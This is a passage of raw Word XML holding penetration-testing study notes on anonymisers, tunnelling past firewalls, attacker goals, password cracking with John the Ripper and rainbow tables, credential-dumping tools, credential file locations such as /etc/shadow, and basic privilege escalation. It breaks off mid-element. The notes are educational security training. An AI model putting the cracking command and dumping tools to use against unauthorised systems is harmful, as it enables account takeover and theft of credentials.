    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**T</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t xml:space="preserve">nion </w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t>outer - TOR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Anonomisers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an hide activity for pen testing when information gathering. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0042501E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>They p</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">rovide protection and anonymity. </w:t>
      </w:r>
      <w:r>
        <w:t>Internet activity cannot be tracked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0042501E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>TOR is a</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> network of virtual private networks used to reroute traffic through their relays.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Another option is "</w:t>
      </w:r>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cotse.net</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t xml:space="preserve"> which also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro</w:t>
      </w:r>
      <w:r w:rsidR="0042501E">
        <w:t>vides a private email service a</w:t>
      </w:r>
      <w:r>
        <w:t>nd even some professional web hosting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0042501E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Anonymizer.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can also provide service for enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E37C76" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Taking data and stuffing it inside another type of data so you can't see what's inside the tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 reason for </w:t>
      </w:r>
      <w:r w:rsidR="00E37C76">
        <w:t xml:space="preserve">tunnelling could be for privacy, such as VPNs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Another reason is if there are restrictions on the network that prevent certain type of data from ingress/egress so tunnelling can avoid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E37C76" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E37C76">
        <w:t>Port forwarding via SSH (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E37C76">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSH tunnelling</w:t>
      </w:r>
      <w:r w:rsidRPr="00E37C76">
        <w:t>) creates a secure connection between a local computer and a remote machine through which services can be relayed. Because the connection is encrypted, SSH tunnelling is useful for transmitting information that uses an unencrypted protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advantage to using </w:t>
      </w:r>
      <w:r w:rsidR="00E37C76">
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tunnelling is that not only are you tunnelling but it is also encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E37C76" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> tunnel is another viable tunnelling option. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E37C76" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> traffic is normally allowed out of a firewall, so it is a good way to configure a </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>tunnel</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> to get in to the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Penetration Goals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Depends on the needs of your target</w:t>
      </w:r>
      <w:r w:rsidR="00434F5D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Malicious attacker will have specific goals- </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t>, information, persistent access and control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Build your scope of attack around the needs of target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Access: Could you break in? How easy was it? Can you repeat it? How?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Information: Usernames, Password, Information about other systems, Credentials for other systems, PII, Credit card numbers, etc...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Persistent Access: Can log in any time? May involve back doors, depending on channels used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Control: Participation in botnet, Use as a leaping off point to other systems, </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to internal systems as needed, Could be used as a tunnel point to other systems...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Always align your work with the scope. No point going off down the rabbit hole if that's not what they want. Show them what you've done and why.</w:t>
      </w:r>
      <w:r w:rsidR="00434F5D">
        <w:t xml:space="preserve"> Everything needs to be logged so that it can be presented to the customer and justified. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Getting a copy of the passwords file is not enough to gain access. All passwords are saved as hashes. Need to get a copy of the file and run</w:t>
      </w:r>
      <w:r w:rsidR="00434F5D">
        <w:t xml:space="preserve"> a program like </w:t>
      </w:r>
      <w:r w:rsidR="00434F5D" w:rsidRPr="00434F5D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">John </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00434F5D" w:rsidRPr="00434F5D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00434F5D" w:rsidRPr="00434F5D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Ripper</w:t>
      </w:r>
      <w:r w:rsidR="00434F5D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --wordlist=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>all.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>mypasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve">Runs John with the wordlist </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D5353D">
        <w:t>all.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve"> against the file mypasswd. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">John will hash all password in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see if the hashed output matches anything in the passwd fie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password cracking </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve">this way </w:t>
      </w:r>
      <w:r>
        <w:t>can take AGES!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Rainbow tables are often used to save on time, which instead will compare already hashed passwords to the passwd file to find a match. This saves the time needed to hash all the possibilities in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. (Hopefully that makes sense)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ophcrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-- free windows password cracker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Rainbow tables can easily be downloaded from the web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5353D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The whole point of a complex password is so that it probably isn't on a word list. Word lists historically only go up to 8 characters. If it's not on a word list then old fashioned brute force attack is required which takes forever to work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cain &amp; Abel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Windows can be used as a windows password cracker,</w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can also do </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poisoning, </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be used to sniff out password files anywhere on the network, even on network devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Different methods of doing password attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LOPHTCrack6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - another password cracker like John. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Brute force attack using a wordlist. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another type of brute force would be to try every </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>character</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in every position. This can be a lot slower than using a word list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Rainbow Tables - brute force but you've done the conversion to the hash ready. Save on CPU cycles. Can be quicker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desk surfing for people that have written down password and left on their desk. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mnemonics</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> &amp; transpositions of letters and numbers "P455w0rd" "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B567C">
        <w:t>P@ssword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B567C">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Password storage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00D5353D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Passwords</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> typically get stored in a 1-way hash function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D5353D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stored passwords in SAM (Security Accounts Manager). Hashed format. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cain &amp; Abel can grab passwords from windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Another good tool is "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pwdump7</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D5353D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>UNIX/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-- user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- requires administrative </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D5353D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Even though there is a /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uses a form of LDAP called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleOpenDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and stores them somewhere else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Become an Admin.</w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Several ways to do his.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Use "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Switch User to root. Will ask for a password for root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
